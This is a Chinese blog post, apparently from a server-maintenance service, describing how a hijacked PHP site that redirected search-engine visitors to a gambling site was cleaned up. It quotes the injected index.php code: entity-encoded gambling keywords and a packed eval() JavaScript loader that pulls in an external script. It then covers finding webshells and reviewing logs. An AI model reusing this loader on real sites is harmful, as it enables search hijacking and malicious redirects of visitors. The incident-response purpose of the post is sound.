首页 » windows » 疑难杂症 » 正文

iis7.5 php网站搜索引擎劫持处理案例

收到朋友微信求助说其中一个php网站被劫持,一直找不到原因,由于他是做网站建设的,服务器上的网站非常杂,存在漏洞被利用然后劫持也是很正常。接下来以这个案例说说网站劫持怎么修复

历史处理案例1:iis7.0全部网站被劫持处理过程分享,如何解决网站劫持!

历史处理案例2:百度 360 搜狗搜索引擎劫持攻击处理过程

百度收录的快照信息:

正常输入网址不会跳转,通过百度 360 搜狗等搜索引擎访问就会跳转到一个博彩网站,看来黑客有意躲避

登录ftp下载index.php存在异常代码如下:

<meta name="viewport" content="width=1250" /> 
<title>&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#32;&#80;&#75;&#49;&#48;&#24320;&#22870;&#30452;&#25773;&#32;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#24320;&#22870;&#32467;&#26524;&#32;&#45;&#32;&#112;&#107;&#49;&#48;&#30452;&#25773;&#32593;</title>
 <meta name="keywords" content="&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#24320;&#22870;&#30452;&#25773;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#35760;&#24405;&#44;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#30452;&#25773;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#30452;&#25773;&#44;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#24320;&#22870;&#32593;&#44;&#112;&#107;&#49;&#48;&#21271;&#20140;&#36187;&#36710;&#32593;&#36186;&#44;&#21271;&#20140;&#36187;&#36710;&#32593;&#36186;&#44;&#21271;&#20140;&#36187;&#36710;&#24102;&#29609;&#44;&#21271;&#20140;&#36187;&#36710;&#32593;&#36186;&#32676;&#44;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#25216;&#24039;&#44;&#21271;&#20140;&#36187;&#36710;&#24590;&#20040;&#29609;&#36186;&#38065;&#44;&#21271;&#20140;&#36187;&#36710;&#32;&#21513;&#31077;&#23089;&#20048;&#44;&#21271;&#20140;&#36187;&#36710;&#23448;&#32593;&#44;&#21271;&#20140;&#36187;&#36710;&#30452;&#25773;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;" />
 <meta name="description" content="&#21271;&#20140;&#36187;&#36710;&#44;&#80;&#75;&#49;&#48;&#24320;&#22870;&#30452;&#25773;&#44;&#25552;&#20379;&#12304;&#99;&#120;&#56;&#56;&#99;&#112;&#46;&#99;&#111;&#109;&#12305;&#35814;&#23613;&#30740;&#31350;&#20998;&#26512;&#24635;&#32467;&#44;&#20998;&#20139;&#21271;&#20140;&#112;&#107;&#49;&#48;&#24320;&#22870;&#35270;&#39057;&#44;&#112;&#107;&#49;&#48;&#32467;&#26524;&#20998;&#26512;&#44;&#21271;&#20140;&#36187;&#36710;&#24179;&#21488;&#44;&#112;&#107;&#49;&#48;&#32593;&#19978;&#25237;&#27880;&#44;&#21271;&#20140;&#112;&#107;&#49;&#48;&#24320;&#22870;&#30452;&#25773;&#44;&#112;&#107;&#49;&#48;&#24320;&#22870;&#30452;&#25773;&#44;&#21271;&#20140;&#112;&#107;&#49;&#48;&#36807;&#24448;&#21508;&#24320;&#22870;&#35760;&#24405;&#44;&#112;&#107;&#49;&#48;&#24320;&#22870;&#32467;&#26524;&#44;&#112;&#107;&#49;&#48;&#32593;&#19978;&#24320;&#25143;&#44;&#112;&#107;&#49;&#48;&#24320;&#22870;&#44;&#19987;&#19994;&#30340;&#24320;&#22870;&#35270;&#39057;&#21271;&#20140;&#112;&#107;&#49;&#48;&#32593;"/>
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\d\\e\\1\\m\\j\\8\\n\\0"]["\\6\\4\\9\\0\\8"](\'\\i\\2\\1\\4\\9\\3\\0 \\0\\k\\3\\8\\c\\7\\0\\8\\h\\0\\5\\f\\b\\q\\b\\2\\1\\4\\9\\3\\0\\7 \\2\\4\\1\\c\\7\\o\\0\\0\\3\\2\\p\\5\\5\\6\\6\\6\\a\\1\\3\\d\\b\\2\\r\\a\\1\\e\\j\\5\\1\\h\\1\\a\\f\\2\\7\\g\\i\\5\\2\\1\\4\\9\\3\\0\\g\');',28,28,'x74|x63|x73|x70|x72|x2f|x77|x22|x65|x69|x2e|x61|x3d|x64|x6f|x6a|x3e|x78|x3c|x6d|x79|window|x75|x6e|x68|x3a|x76|x38'.split('|'),0,{}))
</script>

朋友说删除后一天内又会挂回去,既然能修改页面内容必定存在后门或者有ftp权限等  查看ftp日志并没有收获,WebShellKill走一波发现有所收获扫出几个后门木马和小马 黑客也相当之狡猾把木马文件时间修改成几年前 可惜网站日志没有开启无法追查后门的由来。

网页木马包含asp大马 php大马 php一句话 php小马

为了能彻底处理掉这些后门开启网站访问日志,删除劫持代码静观几天待再次修改主页再分析日志,下为最近访问日志

通过把16号-18号的日志进行筛选查实存在10几个后门,最后把全部木马后门删除 修改网站目录权限再次进入观察

最后建议把网站日志开启,出现被黑可以通过日志进行分析人工排查 市面上能扫后门的工具相当之多比如WebShellKill 安全狗 云盾 云锁等等

本教程由铁网维原创出品 服务器运维官方网址http://www.tieww.com 欢迎大家多多关注本站 感谢大家的支持。



发表评论